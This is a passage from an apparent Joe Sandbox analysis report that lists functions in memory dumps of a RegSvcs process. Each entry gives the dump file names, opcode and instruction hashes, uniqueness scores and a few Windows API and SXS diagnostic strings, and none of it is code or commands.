                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7522e02f0a968be4c03051a6be83e5167ed1201ebc48b7826b674fcc2a59b011
                                                                                            • Instruction ID: 2d9a91b3821744467bf50da12439d19abfffcb0a8a76b5757fc8595650c429b5
                                                                                            • Opcode Fuzzy Hash: 7522e02f0a968be4c03051a6be83e5167ed1201ebc48b7826b674fcc2a59b011
                                                                                            • Instruction Fuzzy Hash: 9F90023120140952D20071598505F46000587E0341F55C02BA0124654E8A1AC9527521
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2DB0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 509c727a14dde4a8a4a69089c7597cb2b6953f78d35a46d2d5b5ae747a186dc6
                                                                                            • Instruction ID: ff3ab78d864ed2b9f705e29237f75c1ed837ce562d537df43a2b5f2e7cdb05ef
                                                                                            • Opcode Fuzzy Hash: 509c727a14dde4a8a4a69089c7597cb2b6953f78d35a46d2d5b5ae747a186dc6
                                                                                            • Instruction Fuzzy Hash: 2090023124140512D24171598505B06000997D0381F95C027A0424554F8A5A8B57BA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2D00 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3cfa36a31d67b36fcdbe40cf27a9c9147e0d585e1d7d7d26abfcc8e540ade7a6
                                                                                            • Instruction ID: ce40d0e6e5f46036ac580dd71564b47921e532af5611ed79629b37493a4aba3d
                                                                                            • Opcode Fuzzy Hash: 3cfa36a31d67b36fcdbe40cf27a9c9147e0d585e1d7d7d26abfcc8e540ade7a6
                                                                                            • Instruction Fuzzy Hash: 2390022120544552D20075599509F06000587D0345F55D026A1064595ECA3A8952B131
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e4045589d4a43b98f1b1f5acd911d7566f6634c11e494f4c6dbfc6f8864816a5
                                                                                            • Instruction ID: 26b299f8f03a1a5191db77788a9ea8f303587f290cbafb8c317f7a41f86ce459
                                                                                            • Opcode Fuzzy Hash: e4045589d4a43b98f1b1f5acd911d7566f6634c11e494f4c6dbfc6f8864816a5
                                                                                            • Instruction Fuzzy Hash: AE90026120180513D24075598905B07000587D0342F55C026A2064555F8E2E8D527135
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2E30 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c4f2b94c5cafbd1a15159439e47342e2613e4e9387bbdb01479dde2c5a391043
                                                                                            • Instruction ID: c87d697994dde827cc6e8617450623ce569347987c4c6c1cc9ed48eea2aa92a9
                                                                                            • Opcode Fuzzy Hash: c4f2b94c5cafbd1a15159439e47342e2613e4e9387bbdb01479dde2c5a391043
                                                                                            • Instruction Fuzzy Hash: 3A90022130140512D20271598515B060009C7D1385F95C027E1424555E8A2A8A53B132
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cfd9012236cf71be9e0b16e5ef8e4ceb8e6f171e5df09a4d10833a045abbf85a
                                                                                            • Instruction ID: 338525c8f979a00768f3fd09b4a34e0654ccc076339ef4152cab07fe217c6a77
                                                                                            • Opcode Fuzzy Hash: cfd9012236cf71be9e0b16e5ef8e4ceb8e6f171e5df09a4d10833a045abbf85a
                                                                                            • Instruction Fuzzy Hash: B490023120180512D20071598909B47000587D0342F55C026A5164555F8A6AC9927531
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2F60 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d4732048b5f0746f4811c3fe012cef0dbf284804a22dcc9f77ee9635052fcde2
                                                                                            • Instruction ID: 8594fc3e491cf51992658a33475aab8f750cd3e322a2d85bb43d53e5728c91b9
                                                                                            • Opcode Fuzzy Hash: d4732048b5f0746f4811c3fe012cef0dbf284804a22dcc9f77ee9635052fcde2
                                                                                            • Instruction Fuzzy Hash: 2090026121140152D20471598505B06004587E1341F55C027A2154554DC92E8D626125
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB3090 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 10c2ac234b3bbcc4646f70379129bf357c9aac232293a3b2c6cfef2689fc80de
                                                                                            • Instruction ID: d6706fd5cc59584028f50bead0c2467f4d2370f531631285b687946cdf35ba9c
                                                                                            • Opcode Fuzzy Hash: 10c2ac234b3bbcc4646f70379129bf357c9aac232293a3b2c6cfef2689fc80de
                                                                                            • Instruction Fuzzy Hash: B690022124140912D2407159C515B070006C7D0741F55C026A0024554E8A1B8A6676B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB3010 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e226dffb496be10f41393d83fa57324c9f92d3ab73f8d64aa16b4989defbf15
                                                                                            • Instruction ID: 901518b73c84797fb36e8785eecf6c0cd221d4fdf31ba9bb825f7c06924895b8
                                                                                            • Opcode Fuzzy Hash: 0e226dffb496be10f41393d83fa57324c9f92d3ab73f8d64aa16b4989defbf15
                                                                                            • Instruction Fuzzy Hash: 0390022120184552D24072598905F0F410587E1342F95C02EA4156554DCD1A89566721
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB35C0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c77d57a1c558aafc4d3fae7fb9be1c2238bfd0e9415eb34bf345e1db7a0edf55
                                                                                            • Instruction ID: 76e28ed9f350a4ad1f76669855933339268c00f56b0119d7f2b7e96b06a9b182
                                                                                            • Opcode Fuzzy Hash: c77d57a1c558aafc4d3fae7fb9be1c2238bfd0e9415eb34bf345e1db7a0edf55
                                                                                            • Instruction Fuzzy Hash: D790023160550512D20071598615B06100587D0341F65C426A0424568E8B9A8A5275A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB39B0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a534aacec7b760f92614495ae8ebaac0c7a5bf2b2d4c87b343613bb570195f13
                                                                                            • Instruction ID: c63b1492a20870efe55b86a77369559deb03932e0804a347535f85b7247f7921
                                                                                            • Opcode Fuzzy Hash: a534aacec7b760f92614495ae8ebaac0c7a5bf2b2d4c87b343613bb570195f13
                                                                                            • Instruction Fuzzy Hash: 3C90022124545212D250715D8505B164005A7E0341F55C036A0814594E895A89567221
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB3D70 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 04d5518840fd7437e2796ae56cda42d06e447ecdaed153fc07dc101644f37aae
                                                                                            • Instruction ID: 855368dc59d132d533faf2fb852845048a9ad40bd2d821cdfeb87640e5d04715
                                                                                            • Opcode Fuzzy Hash: 04d5518840fd7437e2796ae56cda42d06e447ecdaed153fc07dc101644f37aae
                                                                                            • Instruction Fuzzy Hash: B290023520140512D61071599905B46004687D0341F55D426A0424558E8A5989A2B121
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB3D10 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08ec9f5f1e8659905309fb2e9f3a9f0e8dfd2256a564f306c3aed2310f754460
                                                                                            • Instruction ID: 6a543513857fe9d9bcddc8ef53b6baadf62392f5b73fae7bc599bae8a5aa385f
                                                                                            • Opcode Fuzzy Hash: 08ec9f5f1e8659905309fb2e9f3a9f0e8dfd2256a564f306c3aed2310f754460
                                                                                            • Instruction Fuzzy Hash: 2690023120240252964072599905F4E410587E1342B95D42AA0015554DCD1989626221
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction ID: a97ef88a12050e85bd610e44d70fdb988a243a14889f6765f0f56bec3d8fcbee
                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0104A670 Relevance: 12.3, APIs: 8, Instructions: 285timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 6cad68a6982ec3429f9489da279ef8a1408dd3b24d1e32d4ead8e1b52e6b2629
                                                                                            • Instruction ID: 0b56fb7c719e5c3ff7e2cf9aeeaaf111cf14a9b70d78168d5ee2da2f01843103
                                                                                            • Opcode Fuzzy Hash: 6cad68a6982ec3429f9489da279ef8a1408dd3b24d1e32d4ead8e1b52e6b2629
                                                                                            • Instruction Fuzzy Hash: 1BA18CB5B44211CFD715CE18C890A2ABBE5FF88314F19456DEA86DB361EB35EC02CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01046940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                            • Instruction ID: 211f6f5f4dcaf8bc9a091815954e8fcfa0ffbe5511805a3138a79e2cd204f292
                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                            • Instruction Fuzzy Hash: 9F0237B0508341AFD345DF19C890A6FBBE5EFC5700F04896DF9858B260EB76E945CB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID:
                                                                                            • API String ID: 48624451-0
                                                                                            • Opcode ID: f613c33047d7e8eb691e4f27baba3f80aa65e979f933c5e8936f41d89b16af3b
                                                                                            • Instruction ID: 245f6642269519c87b6b7cbcc7c73a8eab5e1efcef675673f676d8c30fd94344
                                                                                            • Opcode Fuzzy Hash: f613c33047d7e8eb691e4f27baba3f80aa65e979f933c5e8936f41d89b16af3b
                                                                                            • Instruction Fuzzy Hash: 9651EBB6E00256BFCB50DF598D90ABEF7B8BB08300B148169E469D7641D734DE40BBE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01022410 Relevance: 9.2, APIs: 6, Instructions: 189COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID:
                                                                                            • API String ID: 48624451-0
                                                                                            • Opcode ID: 49ad388c0e6f3209f9189e3822ab370a9ac3874a8157392e1be4b053c0f49320
                                                                                            • Instruction ID: ea8acfc22463307e705f8a409d0b96ce5c9192de374661a98cfa410ef0686f37
                                                                                            • Opcode Fuzzy Hash: 49ad388c0e6f3209f9189e3822ab370a9ac3874a8157392e1be4b053c0f49320
                                                                                            • Instruction Fuzzy Hash: D151F571A00665AFDB71DEDCC99097EBBF8AF44200B448859E4D6C7682DA74DA409760
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F8A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00FD79D5
                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 00FD79D0, 00FD79F5
                                                                                            • SsHd, xrefs: 00F8A3E4
                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 00FD79FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
